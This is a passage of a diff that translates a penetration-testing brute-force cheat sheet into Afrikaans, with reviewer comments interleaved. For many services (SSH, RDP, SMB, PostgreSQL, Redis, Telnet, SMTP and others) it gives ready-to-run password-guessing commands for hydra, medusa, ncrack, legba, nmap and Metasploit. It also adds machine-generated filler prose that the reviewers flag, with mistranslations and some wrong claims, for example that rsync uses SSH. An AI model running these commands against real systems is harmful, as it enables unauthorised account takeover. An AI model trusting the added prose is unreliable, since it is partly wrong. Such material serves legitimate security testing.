woordelys te skep wat spesifiek is vir die teikengebruiker. + +Dit is belangrik om te onthou dat brute force-aanvalle tydrowend kan wees en dat daar 'n risiko is om opgespoor te word. Dit is dus raadsaam om ander metodes, soos sosiale ingenieurswese of phising, te oorweeg voordat brute force-aanvalle gebruik word. 
```bash hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V 
@@ -356,9 +518,33 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar # SSL legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl ``` - ### PostgreSQL +PostgreSQL is 'n open source objek-relasionele databasisbestuurstelsel (ORDBMS) wat bekend staan ​​om sy betroubaarheid, skaalbaarheid en uitgebreide funksieset. Dit word dikwels gebruik in webtoepassings, data-analise en geografiese inligtingstelsels. + +#### Brute Force-aanvalle op PostgreSQL + +'n Brute Force-aanval op PostgreSQL behels die poging om toegang te verkry tot 'n PostgreSQL-databasis deur herhaaldelik verskillende wagwoorde te probeer totdat die regte een gevind word. Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval op PostgreSQL uit te voer: + +1. **Woordelysgebaseerde aanval**: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om toegang te probeer verkry. Dit is 'n effektiewe metode as die regte wagwoord in die woordelys voorkom. + +2. **Brute Force-aanval met aangepaste wagwoordlys**: Hierdie metode behels die gebruik van 'n aangepaste wagwoordlys wat spesifiek vir die teiken PostgreSQL-databasis ontwikkel is. Dit kan wagwoorde insluit wat verband hou met die teikenorganisasie of gebruiker. + +3. **Brute Force-aanval met willekeurige wagwoorde**: Hierdie metode behels die gebruik van 'n program wat willekeurige wagwoorde genereer en probeer om toegang te verkry deur elke moontlike kombinasie te probeer. Dit is 'n tydrowende metode, maar kan suksesvol wees as die regte wagwoord kort genoeg is. + +#### Voorkoming van Brute Force-aanvalle op PostgreSQL + +Om brute force-aanvalle op PostgreSQL te voorkom, kan die volgende maatreëls geneem word: + +1. **Sterk wagwoordbeleid**: Implementeer 'n sterk wagwoordbeleid wat gebruikers dwing om lang en komplekse wagwoorde te gebruik. Dit sal die tyd wat nodig is om 'n wagwoord te kraak, aansienlik verhoog. + +2. 
**Tweefaktor-verifikasie**: Implementeer tweefaktor-verifikasie om 'n ekstra laag sekuriteit toe te voeg. Dit vereis dat gebruikers 'n tweede vorm van verifikasie, soos 'n eenmalige wagwoord of biometriese inligting, voorsien voordat hulle toegang tot die databasis verkry. + +3. **Beperkings op mislukte aanmeldpogings**: Stel beperkings in vir die aantal mislukte aanmeldpogings wat 'n gebruiker kan hê voordat hulle tydelik geblokkeer word. Dit sal die effektiwiteit van 'n brute force-aanval verminder. + +4. **Monitor vir verdagte aktiwiteit**: Monitor die databasis vir enige verdagte aktiwiteit, soos 'n ongewoon groot aantal aanmeldpogings. Dit kan dui op 'n brute force-aanval en kan vinnige reaksie en herstel moontlik maak. + +Deur hierdie maatreëls te implementeer, kan die risiko van 'n suksesvolle brute force-aanval op PostgreSQL aansienlik verminder word. ```bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres 
@@ -368,109 +554,235 @@ use auxiliary/scanner/postgres/postgres_login nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432 ``` - ### PPTP -You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) - +Jy kan die `.deb` pakkie aflaai om te installeer vanaf [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) ```bash sudo dpkg -i thc-pptp-bruter*.deb #Install the package cat rockyou.txt | thc-pptp-bruter –u ``` - ### RDP +RDP (Remote Desktop Protocol) is 'n protokol wat gebruik word om 'n gebruiker toe te laat om 'n rekenaarstelsel vanaf 'n afstand te beheer. Dit word dikwels gebruik om toegang tot 'n afgeleë rekenaar te verkry en dit te bestuur asof jy fisiek voor die rekenaar sit. + +#### Brute Force-aanvalle teen RDP + +'n Brute Force-aanval teen RDP behels die poging om die regte gebruikersnaam en wagwoord te raai deur verskeie kombinasies te probeer. Dit kan gedoen word deur 'n woordelys van algemene wagwoorde te gebruik of deur alle moontlike kombinasies van karakters te probeer. + +Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval teen RDP uit te voer: + +1. Woordelys-aanval: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om te probeer om die regte wagwoord te raai. Dit is 'n vinnige en eenvoudige metode, maar dit is afhanklik van die wagwoord wat gebruik word. + +2. Woordeboek-aanval: Hierdie metode behels die gebruik van 'n woordeboek van algemene woorde en frases om te probeer om die regte wagwoord te raai. Dit is 'n meer uitgebreide metode as 'n woordelys-aanval, maar dit kan meer tyd neem om die regte wagwoord te vind. + +3. 
Brute Force-aanval met alle moontlike kombinasies: Hierdie metode behels die probeer van alle moontlike kombinasies van karakters om die regte wagwoord te vind. Dit is 'n baie tydrowende metode, maar dit kan die regte wagwoord vind as dit korrek geïmplementeer word. + +Dit is belangrik om te onthou dat die uitvoering van 'n brute force-aanval teen RDP onwettig is sonder die toestemming van die eienaar van die rekenaarstelsel. Dit word aanbeveel om slegs hierdie tegniek te gebruik vir wettige doeleindes, soos om die veiligheid van 'n rekenaarstelsel te toets of om toestemming te verkry om 'n rekenaarstelsel te toets. ```bash ncrack -vv --user -P pwds.txt rdp:// hydra -V -f -L -P rdp:// legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon] ``` - ### Redis +Redis is 'n in-memory data store wat gebruik word vir die stoor en ophaling van data. Dit bied 'n vinnige en effektiewe manier om data te hanteer deur middel van sleutel-waarde pare. Redis ondersteun verskillende datastrukture soos strings, lyste, stelle, kaarte en nog baie meer. + +#### Brute Force-aanvalle teen Redis + +'n Brute force-aanval teen Redis behels die poging om toegang te verkry tot 'n Redis-stelsel deur middel van die uitvoering van 'n groot aantal moontlike kombinasies van gebruikersname en wagwoorde. Hierdie aanval is gebaseer op die feit dat baie gebruikers swak of maklik te raai wagwoorde gebruik. + +Om 'n brute force-aanval teen Redis uit te voer, kan 'n hacker 'n gereedskap soos Hydra of Medusa gebruik. Hierdie gereedskap maak dit moontlik om 'n groot aantal pogings in 'n kort tydperk uit te voer deur gebruik te maak van 'n woordelys van potensiële wagwoorde. + +Om 'n brute force-aanval teen Redis te voorkom, is dit belangrik om sterk en unieke wagwoorde te gebruik. Dit kan ook nuttig wees om 'n stelsel te implementeer wat verdagte pogings om toegang te verkry tot die Redis-stelsel opspoor en blokkeer. 
```bash msf> use auxiliary/scanner/redis/redis_login nmap --script redis-brute -p 6379 hydra –P /path/pass.txt redis://: # 6379 is the default legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl] ``` - ### Rexec +Rexec is 'n protokol wat gebruik word om op afstand uitvoerbare programme op 'n bediener uit te voer. Dit maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie. Rexec is 'n potensiële aanvalsvektor vir 'n brute force-aanval, waar 'n aanvaller probeer om deur herhaaldelike pogings om verskillende kombinasies van gebruikersname en wagwoorde te raai, toegang tot die bediener te verkry. + +Om 'n brute force-aanval teen Rexec uit te voer, kan 'n aanvaller 'n woordelys van moontlike wagwoorde gebruik en dit een vir een probeer totdat die regte kombinasie gevind word. Dit kan 'n tydrowende proses wees, maar as die wagwoord swak is of maklik te raai is, kan die aanvaller suksesvol wees. + +Dit is belangrik om sterk en unieke wagwoorde te gebruik om te voorkom dat 'n brute force-aanval suksesvol is. Daar is ook tegnieke soos die implementering van 'n wagwoordbeleid, die gebruik van tweefaktor-verifikasie en die beperking van die aantal mislukte aanmeldingspogings wat kan help om die risiko van 'n brute force-aanval te verminder. ```bash hydra -l -P rexec:// -v -V ``` - ### Rlogin +Rlogin is 'n protokol wat gebruik word om 'n verband te maak met 'n afgeleë rekenaar oor 'n netwerk. Dit maak gebruik van 'n eenvoudige gebruikersnaam en wagwoord vir verifikasie. Rlogin is 'n onveilige protokol omdat dit nie versleuteling gebruik nie, wat beteken dat die gebruikersnaam en wagwoord in die oop gesien kan word deur 'n aanvaller wat die netwerkverkeer onderskep. + +Brute force-aanvalle kan gebruik word om toegang te verkry tot 'n rlogin-rekening deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. 
Hierdie aanvalle kan uitgevoer word met behulp van gereedskap soos Hydra of Medusa, wat outomatiese aanvalle op rlogin-dienste kan uitvoer deur 'n woordelys van moontlike wagwoorde te gebruik. + +Dit is belangrik om te verseker dat sterk en unieke wagwoorde gebruik word vir rlogin-rekeninge om die risiko van 'n suksesvolle brute force-aanval te verminder. Daarbenewens kan die implementering van 'n veiliger protokol soos SSH oorweeg word om die veiligheid van die netwerkverbindings te verbeter. ```bash hydra -l -P rlogin:// -v -V ``` - ### Rsh +Rsh (Remote Shell) is a network protocol that allows users to execute commands on a remote system. It is commonly used for remote administration tasks. + +#### Brute-Forcing Rsh + +To brute-force Rsh, you can use tools like Hydra or Medusa. These tools automate the process of trying different username and password combinations until a successful login is found. + +Here is an example command using Hydra to brute-force Rsh: + +```plaintext +hydra -l -P rsh:// +``` + +Replace `` with the target username, `` with the path to a file containing a list of passwords, and `` with the IP address of the target system. + +#### Mitigating Rsh Brute-Force Attacks + +To protect against Rsh brute-force attacks, it is recommended to disable the Rsh service if it is not needed. If Rsh is required, strong passwords should be used and account lockout policies should be implemented to prevent multiple failed login attempts. Additionally, monitoring and logging of Rsh login attempts can help detect and respond to brute-force attacks. ```bash hydra -L rsh:// -v -V ``` - [http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind) ### Rsync +Rsync is a utility commonly used for file synchronization and transfer. It allows for efficient copying and updating of files between different systems. Rsync uses the SSH protocol for secure communication and can be used both locally and remotely. 
It is particularly useful for transferring large files or directories and can be automated for regular backups or data replication. Rsync supports various options and can be customized to suit specific needs. ```bash nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 ``` - ### RTSP +RTSP (Real Time Streaming Protocol) is 'n protokol wat gebruik word vir die stroomlynige oordrag van multimedia data oor IP-netwerke. Dit word dikwels gebruik vir die stroomlynige uitsending van video- en klankinhoud. RTSP maak gebruik van die TCP- of UDP-protokol vir die oordrag van data. + +#### Brute Force-aanvalle teen RTSP + +'n Brute Force-aanval teen 'n RTSP-diens behels die outomatiese poging van verskillende kombinasies van gebruikersname en wagwoorde om toegang tot die diens te verkry. Hierdie aanvalle kan uitgevoer word deur gebruik te maak van gereedskap soos Hydra of Medusa. + +Om 'n suksesvolle brute force-aanval teen 'n RTSP-diens uit te voer, is dit belangrik om 'n lys van algemene gebruikersname en wagwoorde te hê. Hierdie lys kan bestaan uit standaardwaardes wat dikwels gebruik word deur gebruikers of beheerders. Dit is ook nuttig om te kyk na enige gelekte wagwoorde wat verband hou met die betrokke RTSP-diens. + +Daarbenewens kan dit nuttig wees om 'n woordelys te gebruik wat bestaan uit algemene woorde, frases en kombinasies wat dikwels gebruik word as wagwoorde. Hierdie woordelys kan gebruik word deur gereedskap soos Hydra of Medusa om die brute force-aanval uit te voer. + +Dit is belangrik om te onthou dat brute force-aanvalle tydrowend kan wees en dat dit 'n groot hoeveelheid pogings kan vereis voordat 'n suksesvolle kombinasie van gebruikersname en wagwoorde gevind word. Daarom is dit belangrik om geduldig te wees en om die nodige tyd en hulpbronne toe te ken aan die uitvoering van die aanval. 
```bash hydra -l root -P passwords.txt rtsp ``` - ### SFTP +SFTP (Secure File Transfer Protocol) is 'n veilige protokol wat gebruik word vir die oordrag van lêers tussen 'n kliënt en 'n bediener. Dit bied 'n veilige en versleutelde verbinding om te verseker dat die oorgedraagde data beskerm word teen afluistering en manipulasie. + +SFTP maak gebruik van 'n sterk kriptografiese protokol om die data te beskerm. Dit maak gebruik van 'n sleuteluitruilproses om 'n veilige sessiesleutel te genereer, wat dan gebruik word om die data te versleutel en te ontsluit. Hierdie versleuteling verseker dat slegs die beoogde ontvanger toegang tot die data het. + +Om SFTP te gebruik, moet jy 'n SFTP-kliënt installeer en konfigureer. Die kliënt stel jou in staat om 'n veilige verbinding met die SFTP-bedieners te maak en lêers oor te dra. Jy sal die nodige inligting, soos die bedieneradres, gebruikersnaam en wagwoord, benodig om die verbinding op te stel. + +SFTP kan gebruik word vir verskeie doeleindes, soos die oordra van lêers tussen gebruikers, die maak van rugsteunkopieë van data, en die deel van lêers met ander gebruikers. Dit is 'n veilige en betroubare manier om lêers oor te dra en te deel, en word dikwels gebruik in omgewings waar data-integriteit en vertroulikheid belangrik is. ```bash legba sftp --username admin --password wordlists/passwords.txt --target localhost:22 # Try keys from a folder legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` - ### SNMP +SNMP (Simple Network Management Protocol) is 'n protokol wat gebruik word om netwerktoestelle te bestuur en te moniteer. Dit maak gebruik van 'n klient-bedienersmodel, waar die SNMP-bestuurder funksies uitvoer op die SNMP-agent op die toestel. + +SNMP maak gebruik van 'n reeks standaardopdragte om inligting van die toestel te bekom en om konfigurasie-aanpassings te maak. Hierdie opdragte sluit in: + +- `GET`: Versoek om 'n spesifieke inligtingswaarde van die toestel te kry. 
+- `SET`: Stel 'n spesifieke inligtingswaarde op die toestel in. +- `GETNEXT`: Versoek om die volgende inligtingswaarde in 'n reeks waardes te kry. +- `GETBULK`: Versoek om 'n groot hoeveelheid inligtingswaardes in een keer te kry. +- `TRAP`: Stuur 'n kennisgewing na die bestuurder wanneer 'n spesifieke gebeurtenis plaasvind. + +SNMP is 'n nuttige hulpmiddel vir netwerkbestuur en -monitering, maar dit kan ook 'n potensiële veiligheidsrisiko wees as dit nie behoorlik geïmplementeer en beveilig word nie. Dit is belangrik om sterk gemeenskapstrings te gebruik, toegang tot SNMP-dienste te beperk en die nodige veiligheidsmaatreëls te tref om te verseker dat slegs geaggregeerde inligting verkry word en dat geen sensitiewe inligting blootgestel word nie. ```bash msf> use auxiliary/scanner/snmp/snmp_login nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ] onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp ``` - ### SMB +SMB (Server Message Block) is 'n protokol wat gebruik word vir die deel van lêers, drukkers, portefeuljes en ander hulpbronne tussen rekenaars op 'n netwerk. Dit is 'n belangrike protokol vir Windows-omgewings en word gebruik vir die bestuur van lêertoegang en netwerkverbindings. + +#### Brute Force-aanvalle op SMB + +'n Brute Force-aanval op SMB is 'n metode waar 'n aanvaller probeer om toegang te verkry tot 'n SMB-bedienaar deur verskeie wagwoorde te probeer. Die aanvaller gebruik 'n lys van potensiële wagwoorde en probeer elkeen totdat die regte wagwoord gevind word. Hierdie tipe aanval kan baie tydrowend wees, maar dit kan suksesvol wees as die regte wagwoord swak of maklik te raai is. 
+ +#### Beskerming teen Brute Force-aanvalle op SMB + +Om jou SMB-bedienaar teen brute force-aanvalle te beskerm, kan jy die volgende maatreëls tref: + +- Stel 'n sterk wagwoordbeleid in wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. +- Beperk die aantal mislukte aanmeldpogings wat 'n gebruiker kan maak voordat hulle tydelik geblokkeer word. +- Implementeer 'n multi-faktor-verifikasie-stelsel om die aanmeldproses te versterk. +- Monitor en analiseer aanmeldpogings om verdagte aktiwiteit te identifiseer. +- Verseker dat jou SMB-bedienaar opgedateer is met die nuutste veiligheidsoplossings en patches. + +Deur hierdie maatreëls te implementeer, kan jy die risiko van 'n suksesvolle brute force-aanval op jou SMB-bedienaar verminder. ```bash nmap --script smb-brute -p 445 hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup ] [--smb-share ] ``` - ### SMTP +SMTP (Simple Mail Transfer Protocol) is 'n protokol wat gebruik word om e-posse te stuur en te ontvang. Dit is 'n algemene protokol wat deur e-posdienste gebruik word om kommunikasie tussen verskillende e-posbedieners te fasiliteer. + +SMTP-bruteforcing is 'n tegniek wat gebruik word om toegang tot 'n e-posrekening te verkry deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. Dit kan gedoen word deur 'n program of 'n spesifieke gereedskap wat ontwerp is vir SMTP-bruteforcing. + +Hier is 'n voorbeeld van hoe 'n bruteforce-aanval op 'n SMTP-bedienaar sou lyk: + +```plaintext +EHLO example.com +AUTH LOGIN +Username: admin +Password: password1 +``` + +In hierdie voorbeeld word die EHLO-opdrag gebruik om die identiteit van die afstuurder te identifiseer. Dan word die AUTH LOGIN-opdrag gebruik om die gebruikersnaam en wagwoord te verifieer. In hierdie geval word die gebruikersnaam as "admin" en die wagwoord as "password1" gespesifiseer. 
+ +Dit is belangrik om te onthou dat SMTP-bruteforcing 'n aanval is en dat dit onwettig is om dit sonder toestemming uit te voer. Dit word meestal gebruik deur etiese hackers en sekuriteitskonsultante as 'n metode om die veiligheid van 'n e-posstelsel te toets. ```bash hydra -l -P /path/to/passwords.txt smtp -V hydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism ] ``` - ### SOCKS +SOCKS (Socket Secure) is 'n protokol wat gebruik word om 'n veilige verbinding te skep tussen 'n klient en 'n bediener deur middel van 'n proxy-bedienersagteware. Dit maak dit moontlik vir die klient om verbindings te maak met bedieners agter 'n vuremuur of NAT (Network Address Translation) en om anoniem te bly deur die IP-adres van die klient te verberg. + +SOCKS-protokol ondersteun verskillende weergawes, insluitend SOCKS4 en SOCKS5. SOCKS5 is die mees gebruikte weergawe en bied aanvullende funksies soos outentisering en UDP (User Datagram Protocol) deurvoer. + +Brute force-aanvalle kan uitgevoer word deur SOCKS te gebruik om verbindings te maak met 'n bediener en dan verskillende wagwoorde of sleutels te probeer om toegang te verkry tot 'n stelsel of rekening. Hierdie aanvalte kan gebruik word om swak wagwoordbeleide te misbruik of om toegang te verkry tot rekeninge deur middel van herhaalde pogings. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat toegang tot die SOCKS-bedienersagteware beperk word tot vertroude gebruikers om brute force-aanvalle te voorkom. 
```bash nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 legba socks5 --target localhost:1080 --username admin --password data/passwords.txt # With alternative address legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080 ``` - ### SQL Server +SQL Server is 'n relatiewe databasisbestuurstelsel wat deur Microsoft ontwikkel is. Dit bied 'n veilige en betroubare omgewing vir die stoor en bestuur van data. SQL Server ondersteun 'n verskeidenheid van funksies en tegnieke vir die hantering van data, insluitend die gebruik van SQL (Structured Query Language) vir die uitvoering van vrae en manipulasie van data. + +#### Brute Force-aanvalle op SQL Server + +'N Brute Force-aanval is 'n aanvalstegniek wat gebruik word om toegang te verkry tot 'n SQL Server-databasis deur herhaaldelik te probeer om gebruikersname en wagwoorde te raai. Hierdie aanval maak gebruik van 'n lys van moontlike gebruikersname en wagwoorde en probeer elke kombinasie totdat die regte kombinasie gevind word. + +Om 'n Brute Force-aanval op 'n SQL Server-databasis uit te voer, kan 'n aanvaller gebruik maak van verskillende hulpmiddels en tegnieke, soos: + +- **Woordelys-aanval**: Hierdie aanval maak gebruik van 'n lys van algemene woorde en wagwoorde om te probeer om toegang te verkry tot die databasis. Die aanvaller kan 'n woordelys van algemene wagwoorde gebruik, soos "password" of "123456", of 'n spesifieke woordelys wat relevant is vir die teikenomgewing. +- **Brute Force-aanval met kragtige rekenaarbronne**: Hierdie aanval maak gebruik van 'n kragtige rekenaarbronne, soos 'n GPU (Graphics Processing Unit) of 'n stel hoëpresterende rekenaars, om 'n groot aantal kombinasies van gebruikersname en wagwoorde vinnig te probeer. 
Dit kan die tyd wat nodig is om 'n suksesvolle aanval uit te voer, aansienlik verkort. +- **Brute Force-aanval met parallelle verwerking**: Hierdie aanval maak gebruik van parallelle verwerkingstegnieke om gelyktydig 'n groot aantal kombinasies van gebruikersname en wagwoorde te probeer. Dit kan die tyd wat nodig is om 'n suksesvolle aanval uit te voer, verminder. + +Om 'n Brute Force-aanval op 'n SQL Server-databasis te voorkom, kan die volgende maatreëls geneem word: + +- **Sterk wagwoordbeleid**: Implementeer 'n sterk wagwoordbeleid wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. Dit kan die moeilikheid verhoog om 'n wagwoord te raai deur 'n Brute Force-aanvaller. +- **Beperk aantal pogings**: Beperk die aantal pogings wat 'n gebruiker kan maak om in te teken op die SQL Server-databasis. Deur die aantal pogings te beperk, kan dit moeiliker wees vir 'n Brute Force-aanvaller om suksesvolle kombinasies van gebruikersname en wagwoorde te vind. +- **Tweeledige verifikasie**: Implementeer tweeledige verifikasie vir toegang tot die SQL Server-databasis. Hierdie maatreël vereis dat gebruikers 'n tweede vorm van verifikasie, soos 'n eenmalige wagwoord of 'n biometriese identifikasie, gebruik om toegang te verkry. +- **Monitoraktiwiteit**: Monitor die aktiwiteit op die SQL Server-databasis om verdagte pogings tot Brute Force-aanvalle te identifiseer. Deur aktiwiteit te monitor, kan potensiële aanvalle vroegtydig opgespoor en voorkom word. + +Dit is belangrik om te verseker dat die SQL Server-databasis behoorlik beveilig is teen Brute Force-aanvalle om die integriteit en vertroulikheid van die data te beskerm. ```bash #Use the NetBIOS name of the machine as domain crackmapexec mssql -d -u usernames.txt -p passwords.txt 
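Review bot: The `+` paragraphs added under `### SOCKS` and `### SQL Server` (and the "Dit is belangrik om te onthou dat SMTP-bruteforcing 'n aanval is..." paragraph before the SMTP block) are not translations of anything on the `-` side, where those sections consist of the heading, a blank line and the code fence; a translation commit should not introduce new generic prose, let alone a legal disclaimer, so drop them and keep only the translated headings. If any of it is kept, two wording errors need fixing: "SQL Server is 'n relatiewe databasisbestuurstelsel" says "relative", the term is "relasionele databasisbestuurstelsel", and the sentence-initial "'N Brute Force-aanval" should be "'n Brute Force-aanval" (the indefinite article stays lowercase and the next word takes the capital).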
@@ -479,9 +791,24 @@ medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssq nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT ``` - ### SSH +SSH (Secure Shell) is 'n protokol wat gebruik word vir veilige kommunikasie en veilige toegang tot 'n afgeleë stelsel. Dit bied 'n veilige manier om op afstand te verbind met 'n stelsel en dit te bestuur. SSH maak gebruik van kriptografie om die vertroulikheid en integriteit van die data wat oorgedra word te verseker. + +#### Brute Force-aanvalle op SSH + +'n Brute Force-aanval op SSH is 'n metode waar 'n aanvaller probeer om toegang te verkry tot 'n SSH-stelsel deur verskeie moontlike kombinasies van gebruikersname en wagwoorde te probeer. Die aanvaller gebruik 'n program of skripsie om outomaties die kombinasies te probeer, totdat die regte kombinasie gevind word. + +Hier is 'n paar tegnieke wat gebruik kan word om 'n brute force-aanval op SSH te voorkom: + +- **Sterk wagwoorde**: Gebruik lang en komplekse wagwoorde wat moeilik is om te raai. +- **Tweefaktor-verifikasie**: Stel tweefaktor-verifikasie in vir SSH, wat 'n ekstra laag van beveiliging bied deur 'n tweede verifikasiefaktor te vereis, soos 'n eenmalige wagwoord of 'n biometriese identifikasie. +- **Beperk toegang**: Beperk die toegang tot SSH deur slegs spesifieke IP-adresse of subnetwerke toe te laat. +- **Monitor aktiwiteit**: Monitor die SSH-loglêers vir verdagte aktiwiteit, soos herhaalde mislukte aanmeldingspogings. +- **Verander die standaard SSH-poort**: Verander die standaard SSH-poort na 'n ander poort om die aanvallers te ontmoedig. 
+- **Gebruik sleutelpare**: Gebruik SSH-sleutelpare in plaas van wagwoorde vir verifikasie. Dit bied 'n hoër vlak van beveiliging omdat die private sleutel nie oorgedra word nie. + +Deur hierdie maatreëls te implementeer, kan jy die risiko van 'n suksesvolle brute force-aanval op jou SSH-stelsel verminder. ```bash hydra -l root -P passwords.txt [-t 32] ssh ncrack -p 22 --user root -P passwords.txt [-T 5] 
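Review bot: The `+` text under `### SSH` in hunk `@@ -479,9 +791,24 @@` is added filler with no counterpart on the `-` side and should be dropped so the page mirrors the English source. If retained, "Die aanvaller gebruik 'n program of skripsie" mistranslates "script": "skripsie" is a thesis, the word is "skrip" (the same slip recurs in the Telnet, VNC and Winrm sections of later hunks). The bullet "Verander die standaard SSH-poort ... om die aanvallers te ontmoedig" recommends obscurity rather than a control; the real mitigations are already in the same list (key-based auth, source IP restriction, lockout and log monitoring), so remove that bullet rather than present it alongside them.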
@@ -491,38 +818,58 @@ legba ssh --username admin --password wordlists/passwords.txt --target localhost # Try keys from a folder legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` +#### Swak SSH-sleutels / Debian voorspelbare PRNG -#### Weak SSH keys / Debian predictable PRNG +Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n drasties verminderde sleutelruimte wat met hulpmiddels soos [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). -Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Pre-generated sets of weak keys are also available such as [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). - -### STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ) - -The STOMP text protocol is a widely used messaging protocol that **allows seamless communication and interaction with popular message queueing services** such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations. +### STOMP (ActiveMQ, RabbitMQ, HornetQ en OpenMQ) +Die STOMP-teksprotokol is 'n wye gebruikte boodskapprotokol wat **naadlose kommunikasie en interaksie met gewilde boodskapwagdienste** soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapverrigtinge uit te voer. 
```bash legba stomp --target localhost:61613 --username admin --password data/passwords.txt ``` - ### Telnet +Telnet is 'n protokol wat gebruik word vir die kommunikasie met 'n bediener oor 'n netwerk. Dit maak dit moontlik om op afstand te verbind met 'n bediener en opdragte uit te voer. Telnet is 'n onveilige protokol omdat die inligting wat oorgedra word nie versleutel is nie. Dit beteken dat 'n aanvaller die inligting wat oorgedra word kan onderskep en lees. + +#### Brute Force-aanvalle op Telnet + +'n Brute Force-aanval op Telnet behels die gebruik van outomatiese sagteware om verskillende kombinasies van gebruikersname en wagwoorde te probeer om toegang tot 'n Telnet-bediening te verkry. Hierdie aanvalle is gebaseer op die feit dat baie gebruikers swak wagwoorde gebruik wat maklik te raai is. Die aanvaller sal 'n lys van algemene wagwoorde gebruik en dit een vir een probeer totdat 'n suksesvolle kombinasie gevind word. + +#### Teenmaatreëls teen Brute Force-aanvalle op Telnet + +Om jouself teen Brute Force-aanvalle op Telnet te beskerm, kan jy die volgende teenmaatreëls implementeer: + +- Verander die standaard Telnet-poort na 'n ander poort om die aanvaller te verwar. +- Stel 'n sterk wagwoordbeleid in en moedig gebruikers aan om unieke en komplekse wagwoorde te gebruik. +- Beperk die aantal mislukte aanmeldingspogings om te voorkom dat 'n aanvaller herhaaldelik probeer om toegang te verkry. +- Implementeer tweefaktor-verifikasie om 'n ekstra laag van sekuriteit toe te voeg. +- Monitor die Telnet-loglêers vir verdagte aktiwiteit en neem onmiddellik aksie as 'n aanval gedetekteer word. + +Deur hierdie teenmaatreëls te implementeer, kan jy die risiko van 'n suksesvolle Brute Force-aanval op Telnet verminder. 
```bash hydra -l root -P passwords.txt [-t 32] telnet ncrack -p 23 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M telnet legba telnet \ - --username admin \ - --password wordlists/passwords.txt \ - --target localhost:23 \ - --telnet-user-prompt "login: " \ - --telnet-pass-prompt "Password: " \ - --telnet-prompt ":~$ " \ - --single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin +--username admin \ +--password wordlists/passwords.txt \ +--target localhost:23 \ +--telnet-user-prompt "login: " \ +--telnet-pass-prompt "Password: " \ +--telnet-prompt ":~$ " \ +--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin ``` - ### VNC +VNC (Virtual Network Computing) is 'n protokol wat gebruik word om 'n grafiese gebruikerskoppelvlak (GUI) oor 'n netwerk te deel. Dit maak dit moontlik vir 'n gebruiker om 'n afgeleë rekenaar te bedien en toegang te verkry tot die grafiese omgewing daarvan. VNC kan gebruik word vir afstandbeheer, hulp op afstand, demonstrasies en ander toepassings waar 'n grafiese gebruikerskoppelvlak oor 'n netwerk gedeel moet word. + +'n Brute force-aanval teen VNC behels die gebruik van 'n program of skripsie om verskeie kombinasies van gebruikersname en wagwoorde te probeer om toegang tot 'n 